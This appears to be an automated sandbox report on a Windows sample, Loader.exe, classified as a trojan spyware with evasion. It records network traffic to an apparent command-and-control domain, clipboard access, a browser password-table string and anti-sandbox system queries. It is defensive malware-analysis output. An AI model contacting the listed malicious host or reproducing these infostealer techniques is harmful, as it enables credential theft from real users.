                Source: Loader.exe, 00000003.00000003.2266991537.00000000033AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.
                Source: Loader.exe, 00000003.00000003.2266991537.00000000033AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&cta
                Source: Loader.exe, 00000003.00000003.2206604298.00000000033EA000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2206502686.00000000033ED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: Loader.exe, 00000003.00000003.2206604298.00000000033EA000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2206502686.00000000033ED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: Loader.exe, 00000003.00000003.2206604298.00000000033EA000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2206502686.00000000033ED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: Loader.exe, 00000003.00000003.2266991537.00000000033AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg
                Source: Loader.exe, 00000003.00000003.2266991537.00000000033AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                Source: Loader.exe, 00000003.00000003.2206604298.00000000033EA000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2206502686.00000000033ED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: Loader.exe, 00000003.00000003.2206604298.00000000033EA000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2206502686.00000000033ED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: Loader.exe, 00000003.00000003.2206604298.00000000033EA000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2206502686.00000000033ED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: Loader.exe, 00000003.00000003.2266991537.00000000033AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
                Source: Loader.exe, 00000003.00000003.2266478331.00000000034C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                Source: Loader.exe, 00000003.00000003.2266478331.00000000034C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                Source: Loader.exe, 00000003.00000003.2457635116.0000000000AF3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://volcanohushe.click/
                Source: Loader.exe, 00000003.00000003.2298733813.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2324979359.0000000000AB0000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2298858534.0000000000AAE000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2299868440.0000000000AAF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://volcanohushe.click/%app
                Source: Loader.exe, 00000003.00000003.2205684949.0000000000A91000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://volcanohushe.click/M??
                Source: Loader.exe, 00000003.00000003.2205684949.0000000000AAC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://volcanohushe.click/T
                Source: Loader.exe, 00000003.00000003.2325175528.0000000000B14000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2343993161.0000000000B11000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://volcanohushe.click/api
                Source: Loader.exe, 00000003.00000003.2324626659.0000000000B11000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://volcanohushe.click/api$P
                Source: Loader.exe, 00000003.00000003.2299745097.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2330397824.0000000000B0E000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000002.3409137229.0000000000B11000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2300072128.0000000000B13000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2298552259.0000000000B08000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2298638638.0000000000B0E000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2325175528.0000000000B14000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2330501381.0000000000B13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://volcanohushe.click/api2K
                Source: Loader.exe, 00000003.00000003.2378382701.0000000000AB0000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000002.3409099739.0000000000AF5000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2457635116.0000000000AF3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://volcanohushe.click/t
                Source: Loader.exe, 00000003.00000003.2205684949.0000000000AAC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://volcanohushe.click/ts/M
                Source: Loader.exe, 00000003.00000003.2298552259.0000000000B29000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2299745097.0000000000B29000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://volcanohushe.click:443/api
                Source: Loader.exe, 00000003.00000003.2325175528.0000000000B29000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://volcanohushe.click:443/apiXMVQGAH.xlsxH
                Source: Loader.exe, 00000003.00000003.2378382701.0000000000AB0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://volcanohushe.click:443/apik
                Source: Loader.exe, 00000003.00000003.2266991537.00000000033AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3
                Source: Loader.exe, 00000003.00000003.2206604298.00000000033EA000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2206502686.00000000033ED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: Loader.exe, 00000003.00000003.2206604298.00000000033EA000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2206502686.00000000033ED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: Loader.exe, 00000003.00000003.2266368076.00000000033CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.or
                Source: Loader.exe, 00000003.00000003.2266368076.00000000033CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org
                Source: Loader.exe, 00000003.00000003.2266478331.00000000034C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.bwSC1pmG_zle
                Source: Loader.exe, 00000003.00000003.2266478331.00000000034C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.hjKdHaZH-dbQ
                Source: Loader.exe, 00000003.00000003.2266478331.00000000034C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                Source: Loader.exe, 00000003.00000003.2266991537.00000000033AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_
                Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
                Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
                Source: unknownHTTPS traffic detected: 172.67.145.201:443 -> 192.168.2.6:49708 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.145.201:443 -> 192.168.2.6:49709 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.145.201:443 -> 192.168.2.6:49710 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.145.201:443 -> 192.168.2.6:49712 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.145.201:443 -> 192.168.2.6:49723 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.145.201:443 -> 192.168.2.6:49730 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.145.201:443 -> 192.168.2.6:49743 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.145.201:443 -> 192.168.2.6:49754 version: TLS 1.2
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00433500 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,3_2_00433500
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_031B1000 EntryPoint,GetClipboardSequenceNumber,Sleep,Sleep,OpenClipboard,GetClipboardData,GlobalLock,GlobalAlloc,GlobalLock,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,GlobalUnlock,CloseClipboard,GetClipboardSequenceNumber,3_2_031B1000
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00433500 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,3_2_00433500
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00EBE0940_2_00EBE094
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00EB10000_2_00EB1000
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00ED61020_2_00ED6102
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00EC2AA10_2_00EC2AA1
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00ED43FF0_2_00ED43FF
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00EC8D900_2_00EC8D90
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00EC3EA00_2_00EC3EA0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004098CE3_2_004098CE
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004230D33_2_004230D3
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004260903_2_00426090
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0042217D3_2_0042217D
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0040D11B3_2_0040D11B
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0042C98C3_2_0042C98C
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00411BC03_2_00411BC0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0043DBAC3_2_0043DBAC
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004094003_2_00409400
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004384B03_2_004384B0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0041052C3_2_0041052C
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0043FEF03_2_0043FEF0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004407703_2_00440770
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004387D03_2_004387D0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004290703_2_00429070
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004090003_2_00409000
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004280003_2_00428000
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0041C0C03_2_0041C0C0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004058D03_2_004058D0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004038D03_2_004038D0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004237503_2_00423750
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0043E8A73_2_0043E8A7
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0042A9503_2_0042A950
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0041C9203_2_0041C920
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004301D53_2_004301D5
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004239E03_2_004239E0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004391E13_2_004391E1
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004081803_2_00408180
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004061803_2_00406180
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004401803_2_00440180
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0041E9903_2_0041E990
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0041A1903_2_0041A190
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004191903_2_00419190
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0041B9A03_2_0041B9A0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004182413_2_00418241
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0041FA743_2_0041FA74
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00430A783_2_00430A78
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004172073_2_00417207
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004332103_2_00433210
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00428A313_2_00428A31
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00415A3C3_2_00415A3C
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0042C2C13_2_0042C2C1
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004042803_2_00404280
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004142A03_2_004142A0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00417AB83_2_00417AB8
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00423B403_2_00423B40
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0041D3503_2_0041D350
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00421B003_2_00421B00
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0042D3063_2_0042D306
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004163C03_2_004163C0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004393D03_2_004393D0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004383D03_2_004383D0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004073F03_2_004073F0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0042D3F13_2_0042D3F1
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004253803_2_00425380
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0043F3803_2_0043F380
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00422B843_2_00422B84
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0041CB903_2_0041CB90
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0042D3913_2_0042D391
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00422BA03_2_00422BA0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00404BB03_2_00404BB0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004404503_2_00440450
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0042B46E3_2_0042B46E
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00436C7D3_2_00436C7D
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004264303_2_00426430
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0042B4353_2_0042B435
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00418CE13_2_00418CE1
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00439C8E3_2_00439C8E
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0043F4903_2_0043F490
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0040CC993_2_0040CC99
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0040E49F3_2_0040E49F
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004374A33_2_004374A3
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00427D523_2_00427D52
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0042856C3_2_0042856C
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004155063_2_00415506
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004275273_2_00427527
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0043EDCE3_2_0043EDCE
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0043F5E03_2_0043F5E0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00437D803_2_00437D80
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0041D5B03_2_0041D5B0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004066103_2_00406610
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0042E6173_2_0042E617
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00405E203_2_00405E20
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00427E223_2_00427E22
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004286303_2_00428630
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004306373_2_00430637
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004266393_2_00426639
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00402ED03_2_00402ED0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00417EEE3_2_00417EEE
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0043F6903_2_0043F690
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00415E9A3_2_00415E9A
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00414EA03_2_00414EA0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0040F6AA3_2_0040F6AA
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0042774C3_2_0042774C
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004237503_2_00423750
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004217703_2_00421770
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0040AF233_2_0040AF23
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0043F7303_2_0043F730
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0043C7303_2_0043C730
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00410FC83_2_00410FC8
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00426FD03_2_00426FD0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00437FE03_2_00437FE0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0040A7803_2_0040A780
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0041CFA03_2_0041CFA0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004257AC3_2_004257AC
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00EBE0943_2_00EBE094
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00EB10003_2_00EB1000
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00ED61023_2_00ED6102
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00EC2AA13_2_00EC2AA1
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00ED43FF3_2_00ED43FF
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00EC8D903_2_00EC8D90
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00EC3EA03_2_00EC3EA0
                Source: C:\Users\user\Desktop\Loader.exeCode function: String function: 00EBE5A0 appears 98 times
                Source: C:\Users\user\Desktop\Loader.exeCode function: String function: 00407F80 appears 48 times
                Source: C:\Users\user\Desktop\Loader.exeCode function: String function: 00ECBE0D appears 40 times
                Source: C:\Users\user\Desktop\Loader.exeCode function: String function: 00EC75AB appears 42 times
                Source: C:\Users\user\Desktop\Loader.exeCode function: String function: 00414290 appears 76 times
                Source: Loader.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: Loader.exeStatic PE information: Section: .bss ZLIB complexity 1.0003249845551894
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@4/1@1/1
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004387D0 RtlExpandEnvironmentStrings,CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,3_2_004387D0
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5228:120:WilError_03
                Source: Loader.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Desktop\Loader.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: Loader.exe, 00000003.00000003.2235608394.00000000033D6000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2207141098.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2207461953.00000000033B9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: Loader.exeReversingLabs: Detection: 36%
                Source: Loader.exeVirustotal: Detection: 31%
                Source: C:\Users\user\Desktop\Loader.exeFile read: C:\Users\user\Desktop\Loader.exeJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\Loader.exe "C:\Users\user\Desktop\Loader.exe"
                Source: C:\Users\user\Desktop\Loader.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\Loader.exeProcess created: C:\Users\user\Desktop\Loader.exe "C:\Users\user\Desktop\Loader.exe"
                Source: C:\Users\user\Desktop\Loader.exeProcess created: C:\Users\user\Desktop\Loader.exe "C:\Users\user\Desktop\Loader.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: webio.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: Loader.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_ISOLATION, TERMINAL_SERVER_AWARE
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00EE822B push 9003h; ret 0_2_00EE8236
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00EBE75A push ecx; ret 0_2_00EBE76D
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004488E1 push edi; ret 3_2_004488E3
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0043F2F0 push eax; mov dword ptr [esp], F5F4FB8Ah3_2_0043F2F2
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00EBE75A push ecx; ret 3_2_00EBE76D
                Source: C:\Users\user\Desktop\Loader.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Source: C:\Users\user\Desktop\Loader.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
                Source: C:\Users\user\Desktop\Loader.exeSystem information queried: FirmwareTableInformationJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeWindow / User API: threadDelayed 6133Jump to behavior
